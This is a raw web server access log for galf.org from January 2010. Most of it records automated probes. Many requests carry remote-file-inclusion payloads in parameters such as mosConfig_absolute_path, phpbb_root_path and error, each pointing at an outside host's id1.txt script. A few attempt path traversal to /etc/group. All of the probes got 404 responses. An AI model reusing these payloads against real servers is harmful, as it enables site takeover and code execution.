78.110.50.121 - - [04/Jan/2010:06:12:17 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:12:32 -0800] "GET /logs/access_091221.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:12:41 -0800] "GET /logs/access_091221.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:06:14:27 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:06:14:28 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:06:14:28 -0800] "GET /logs/access_091207.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:06:14:46 -0800] "GET /?M=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:06:14:52 -0800] "GET /logs/access_091123.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:06:15:29 -0800] "GET /logs/access_091207.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:06:15:29 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:06:15:29 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:06:15:49 -0800] "GET /logs/access_091123.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:15:59 -0800] "GET /logs/ HTTP/1.0" 200 4926 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:16:00 -0800] "GET /?D=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:16:02 -0800] "GET /?N=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:16:03 -0800] "GET /?N=D HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:16:04 -0800] "GET /?M=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:16:06 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:06:17:28 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:06:17:28 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:06:17:28 -0800] "GET /logs/access_091221.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:06:17:29 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:06:17:32 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:06:17:37 -0800] "GET /logs/access_091207.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:06:17:54 -0800] "GET /logs/access_091123.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:17:56 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:18:00 -0800] "GET /logs/access_090928.log%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:01 -0800] "GET /logs/access_091221.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:18:03 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:18:13 -0800] "GET /logs/access_090810.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:18:41 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:18:41 -0800] "GET /logs/access_090914.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:18:41 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:18:41 -0800] "GET /logs/access_090810.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:45 -0800] "GET /includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:45 -0800] "GET /logs//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:45 -0800] "GET /logs/access_091123.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:45 -0800] "GET /includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:45 -0800] "GET /logs/access_091123.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:45 -0800] "GET /logs//includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:47 -0800] "GET /includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:47 -0800] "GET /logs//includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:47 -0800] "GET /logs/access_091123.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:49 -0800] "GET /logs/access_091221.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:50 -0800] "GET /includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:50 -0800] "GET /logs//includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:50 -0800] "GET /logs/access_091123.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:53 -0800] "GET /logs/access_091221.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:18:54 -0800] "GET /logs/access_091221.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:18:54 -0800] "GET /logs/access_091221.log%20%20//includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:19:19 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:19:19 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:06:19:19 -0800] "GET /logs/access_090622.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:19:48 -0800] "GET /logs/access_091123.log//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:19:48 -0800] "GET /includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:19:48 -0800] "GET /logs//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:06:20:43 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:06:20:43 -0800] "GET /logs/access_091026.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:06:20:43 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:06:20:57 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:06:20:57 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:20:59 -0800] "GET /includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:20:59 -0800] "GET /logs//includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:20:59 -0800] "GET /logs/access_091123.log//includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:06:21:02 -0800] "GET /logs/access_091207.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:21:13 -0800] "GET /logs/access_091221.log//includes/info.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:06:21:32 -0800] "GET /logs/access_091123.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:21:36 -0800] "GET /logs/access_091123.log//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:21:36 -0800] "GET /includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:21:36 -0800] "GET /logs//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:06:21:50 -0800] "GET /logs/access_091221.log//includes/info.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.228.161.3 - - [04/Jan/2010:06:22:25 -0800] "GET /logs/access.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
67.228.161.3 - - [04/Jan/2010:06:22:25 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
67.228.161.3 - - [04/Jan/2010:06:22:26 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
195.190.166.35 - - [04/Jan/2010:06:23:21 -0800] "GET /logs/access_091207.log%20%20//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:06:23:34 -0800] "GET /logs/access_090601.log%20%20//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:06:26:04 -0800] "GET /logs/access_091116.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:06:26:46 -0800] "GET /logs/access_090921.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:06:30:36 -0800] "GET /logs/access_091207.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:06:30:37 -0800] "GET /logs/access_091123.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.228.161.3 - - [04/Jan/2010:06:32:27 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
195.190.166.35 - - [04/Jan/2010:06:33:17 -0800] "GET /logs/access_090601.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.2 - - [04/Jan/2010:06:37:40 -0800] "GET /logs/access_090921.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.2 - - [04/Jan/2010:06:37:41 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.2 - - [04/Jan/2010:06:37:41 -0800] "GET /logs/access_090914.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.2 - - [04/Jan/2010:06:37:41 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:06:37:57 -0800] "GET /logs/access_091130.log//index.php?DOCUMENT_ROOT=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:06:37:57 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.2 - - [04/Jan/2010:06:38:16 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.2 - - [04/Jan/2010:06:38:16 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.2 - - [04/Jan/2010:06:38:16 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:06:38:48 -0800] "GET /logs/access_091123.log//index.php?DOCUMENT_ROOT=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:06:40:38 -0800] "GET /logs/access_090601.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:06:48:56 -0800] "GET /logs/access_090817.log%20%20//index.php?DOCUMENT_ROOT=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:06:49:28 -0800] "GET /logs/access_091130.log%20%20//index.php?DOCUMENT_ROOT=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:06:55:15 -0800] "GET /logs/access_090601.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:07:01:42 -0800] "GET /logs/access_091221.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:07:01:42 -0800] "GET /logs/access_091221.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:07:05:33 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:07:05:33 -0800] "GET /logs/access_090824.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:07:05:33 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:07:05:38 -0800] "GET /logs/access_090817.log//index.php?DOCUMENT_ROOT=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:07:05:53 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.14.103.146 - - [04/Jan/2010:07:05:53 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.14.103.146 - - [04/Jan/2010:07:05:53 -0800] "GET /logs/access.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.53.110.2 - - [04/Jan/2010:07:07:51 -0800] "GET /logs/access.log%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:07:07:52 -0800] "GET /logs/access.log%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
118.68.37.83 - - [04/Jan/2010:07:15:26 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.com.vn/search?rlz=1C1_____enVN355VN355&sourceid=chrome&ie=UTF-8&q=index+of%2Flogs" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.22 Safari/532.5" "www.galf.org"
118.68.37.83 - - [04/Jan/2010:07:15:29 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.22 Safari/532.5" "www.galf.org"
118.68.37.83 - - [04/Jan/2010:07:15:42 -0800] "GET /logs/access.log HTTP/1.1" 200 447040 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.22 Safari/532.5" "www.galf.org"
211.232.85.247 - - [04/Jan/2010:07:29:43 -0800] "GET /logs/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [04/Jan/2010:07:29:44 -0800] "GET /logs/access.log/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [04/Jan/2010:07:29:44 -0800] "GET /errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [04/Jan/2010:07:29:51 -0800] "GET /logs/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [04/Jan/2010:07:29:51 -0800] "GET /errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [04/Jan/2010:07:29:51 -0800] "GET /logs/access.log/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:30:21 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:30:21 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
